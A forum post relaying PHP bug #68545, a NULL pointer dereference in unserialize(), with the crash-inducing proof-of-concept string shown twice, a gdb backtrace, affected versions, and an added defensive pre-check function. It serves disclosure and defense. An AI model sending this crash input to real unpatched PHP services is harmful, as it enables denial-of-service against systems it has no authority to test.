This post was last edited by s.Bo on 2014-12-29 10:36
The PHP 5.6.4 ChangeLog lists a fixed vulnerability:
Fixed bug #68545 (NULL pointer dereference in unserialize.c).
https://bugs.php.net/bug.php?id=68545
Description:
------------
There's a NULL pointer dereference issue in the var_push_dtor function in unserialize.c.
By running the test script, you'll get the following segfault:
Program received signal SIGSEGV, Segmentation fault.
var_push_dtor (var_hashx=0x0, rval=0x7ffff7fdb858) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:62
62 var_entries *var_hash = (*var_hashx)->last_dtor;
According to 3v4l.org, it crashes on the following versions (http://3v4l.org/BtYZg):
4.3.10 - 4.4.9, 5.0.3 - 5.6.3, php7@20140507 - 20141101:
Test script:
---------------
<?php
echo unserialize('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"b22";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";');
?>
Expected result:
----------------
The interpreter shouldn't crash.
Actual result:
--------------
(gdb) bt
#0 var_push_dtor (var_hashx=0x0, rval=0x7ffff7fdb7d0) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:62
#1 0x00000000004481af in process_nested_data (p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x0, ht=0x7ffff7fdb700, elements=4, objprops=0, rval=<optimized out>)
at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:329
#2 0x0000000000fdc686 in php_var_unserialize (rval=<optimized out>, p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x0) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:815
#3 0x0000000000447436 in process_nested_data (p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x7fffffffab90, ht=0x7ffff7fdb678, elements=5, objprops=0, rval=<optimized out>)
at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:297
#4 0x0000000000fdc686 in php_var_unserialize (rval=<optimized out>, p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x7fffffffab90) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:815
#5 0x0000000000f9884a in zif_unserialize (ht=<optimized out>, return_value=0x7ffff7fda908, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>)
at /home/charlie/php-5.6.3/ext/standard/var.c:965
#6 0x000000000158cf5c in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7fa8110) at /home/charlie/php-5.6.3/Zend/zend_vm_execute.h:558
#7 0x0000000001483b1a in execute_ex (execute_data=0x7ffff7fa8110) at /home/charlie/php-5.6.3/Zend/zend_vm_execute.h:363
#8 0x00000000012824cd in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/charlie/php-5.6.3/Zend/zend.c:1344
#9 0x000000000105522a in php_execute_script (primary_file=0x7fffffffd1c0) at /home/charlie/php-5.6.3/main/main.c:2584
#10 0x000000000159a1ed in do_cli (argc=3, argv=0x22979a0) at /home/charlie/php-5.6.3/sapi/cli/php_cli.c:994
#11 0x000000000045052d in main (argc=3, argv=0x22979a0) at /home/charlie/php-5.6.3/sapi/cli/php_cli.c:1378
#12 0x00007ffff710976d in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6
#13 0x0000000000450601 in _start ()
Running unserialize on the test code from the bug report crashes PHP outright:
<?php
echo unserialize('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"b22";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";');
Affected versions
PHP 5.0.*
PHP 5.2.*
PHP 5.3.*
PHP 5.4.* versions < 5.4.36
PHP 5.5.* versions < 5.5.20
PHP 5.6.* versions < 5.6.4
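A defensive pre-check, added here as an example and not code from the bug report or from PHP itself: it walks the serialized structure before unserialize() is ever called and rejects inputs shaped like the PoC, which puts an array where a key is expected and ends before its arrays are closed. The function names and the restriction to N/b/i/d/s/a are this example's own choices; the sample inputs are constructed.

```php
<?php
// Added example, not code from the bug report or from PHP itself. A hypothetical
// pre-check for serialized data that crosses a trust boundary: a recursive-descent
// walk over the format that accepts only N/b/i/d/s/a and requires every array key
// to be an integer or string, so malformed input never reaches unserialize().
function serialized_input_is_well_formed(string $s): bool
{
    $pos = 0;
    return parse_value($s, $pos, false) && $pos === strlen($s);
}

// Parse one value at $pos; with $asKey only the key types i: and s: are accepted.
function parse_value(string $s, int &$pos, bool $asKey): bool
{
    $len = strlen($s);
    if ($pos >= $len) return false;                                  // truncated input
    $type = $s[$pos];
    if ($asKey && $type !== 'i' && $type !== 's') return false;     // array/object/null/bool/float as key
    switch ($type) {
        case 'N':                                                    // N;
            if (substr($s, $pos, 2) !== 'N;') return false;
            $pos += 2;
            return true;
        case 'b': case 'i': case 'd':                                // b:1;  i:-42;  d:0.5;
            if (!preg_match('/\G[bid]:[-+]?[0-9.eE+-]+;/', $s, $m, 0, $pos)) return false;
            $pos += strlen($m[0]);
            return true;
        case 's':                                                    // s:3:"abc";  declared length is verified
            if (!preg_match('/\Gs:([0-9]+):"/', $s, $m, 0, $pos)) return false;
            $start = $pos + strlen($m[0]);
            $n = (int) $m[1];
            if (substr($s, $start + $n, 2) !== '";') return false;
            $pos = $start + $n + 2;
            return true;
        case 'a':                                                    // a:2:{ key;value; key;value; }
            if (!preg_match('/\Ga:([0-9]+):\{/', $s, $m, 0, $pos)) return false;
            $pos += strlen($m[0]);
            for ($i = 0, $n = (int) $m[1]; $i < $n; $i++) {
                if (!parse_value($s, $pos, true) || !parse_value($s, $pos, false)) return false;
            }
            if ($pos >= $len || $s[$pos] !== '}') return false;
            $pos++;
            return true;
        default:                                                     // O:, C:, r:, R: are deliberately not accepted
            return false;
    }
}
// Constructed inputs: a shortened variant of the PoC (array in key position, truncated) and a valid array.
var_dump(serialized_input_is_well_formed('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";'));
var_dump(serialized_input_is_well_formed('a:2:{i:0;s:3:"foo";s:3:"key";a:1:{i:7;N;}}'));
```

The check is a stopgap for code that cannot drop unserialize() on external data immediately; upgrading to a fixed release and moving to a format such as JSON for untrusted input are the real mitigations.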